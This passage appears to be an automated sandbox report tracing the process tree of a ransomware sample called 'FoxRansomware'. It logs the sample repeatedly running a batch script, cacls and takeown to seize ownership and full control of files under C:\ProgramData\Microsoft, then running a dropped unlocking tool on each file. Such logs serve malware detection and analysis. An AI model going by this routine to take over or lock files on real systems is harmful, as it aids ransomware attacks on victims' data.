3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:276

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:6380

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
2⤵
PID:268

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
3⤵
PID:292

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "background.png" -nobanner
3⤵
PID:6476

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "background.png" -nobanner
4⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
2⤵
PID:5984

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
3⤵
PID:5788

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "tasks.xml" -nobanner
3⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "tasks.xml" -nobanner
4⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:2444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
2⤵
PID:5512

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
3⤵
PID:7580

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "behavior.xml" -nobanner
3⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "behavior.xml" -nobanner
4⤵
PID:4476

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
2⤵
PID:7352

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4168

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
3⤵
PID:6644

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "superbar.png" -nobanner
3⤵
PID:5336

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "superbar.png" -nobanner
4⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
2⤵
PID:4080

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
3⤵
PID:7344

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "behavior.xml" -nobanner
3⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "behavior.xml" -nobanner
4⤵
PID:6536

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:8148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
2⤵
PID:8096

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
3⤵
PID:3216

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:5348

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml""
2⤵
PID:1112

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml" /E /G Admin:F /C
3⤵
PID:7180

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:6052

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml""
2⤵
PID:7428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7556

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml" /E /G Admin:F /C
3⤵
PID:7540

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:6340

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:7220

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
2⤵
PID:7620

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6448

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
3⤵
PID:6148

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
3⤵
PID:7304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:7560

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:5384

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
2⤵
PID:7284

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7164

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
3⤵
PID:6856

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
3⤵
PID:6368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "background.png" -nobanner
3⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "background.png" -nobanner
4⤵
PID:7480

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
2⤵
PID:7844

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
3⤵
PID:4000

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
3⤵
PID:4656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:8064

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
2⤵
PID:7824

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
3⤵
PID:7700

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
3⤵
PID:7932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:6428

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""
2⤵
PID:7348

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7780

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C
3⤵
PID:7872

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"
3⤵
- Modifies file permissions
PID:6660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
3⤵
PID:7900

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
4⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""
2⤵
PID:8176

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:8180

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C
3⤵
PID:7148

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"
3⤵
PID:3092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
3⤵
PID:6164

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
4⤵
PID:8120

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:1236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""
2⤵
PID:7772

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:8092

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C
3⤵
PID:5556

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"
3⤵
PID:796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftWordpad.xml" -nobanner
3⤵
PID:7864

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftWordpad.xml" -nobanner
4⤵
PID:6832

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
2⤵
PID:5636

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7520

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
3⤵
PID:7708

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
3⤵
PID:8008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
3⤵
PID:5048

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
4⤵
PID:8000

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
2⤵
PID:6504

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
3⤵
PID:5988

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
3⤵
- Modifies file permissions
PID:5880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
3⤵
PID:5112

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
4⤵
PID:3900

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
2⤵
PID:6316

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
3⤵
PID:8184

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
3⤵
PID:7240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
3⤵
PID:6756

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
4⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
2⤵
PID:4440

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
3⤵
PID:6588

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
3⤵
- Modifies file permissions
PID:7072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
3⤵
PID:6972

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
4⤵
PID:6420

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
2⤵
PID:5516

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
3⤵
PID:5628

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
3⤵
PID:6484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:1968

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""
2⤵
PID:5856

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
3⤵
PID:6936

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"
3⤵
- Modifies file permissions
PID:5704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "StorageHealthModel.dat" -nobanner
3⤵
PID:7388

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "StorageHealthModel.dat" -nobanner
4⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""
2⤵
PID:1008

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6388

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C
3⤵
PID:5508

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"
3⤵
PID:6836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
3⤵
PID:7112

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
4⤵
PID:8020

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""
2⤵
PID:7536

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C
3⤵
PID:636

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"
3⤵
- Modifies file permissions
PID:2444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
3⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
4⤵
PID:6020

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""
2⤵
PID:5896

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C
3⤵
PID:6996

C:\Windows\SysWOW64\takeown.exe
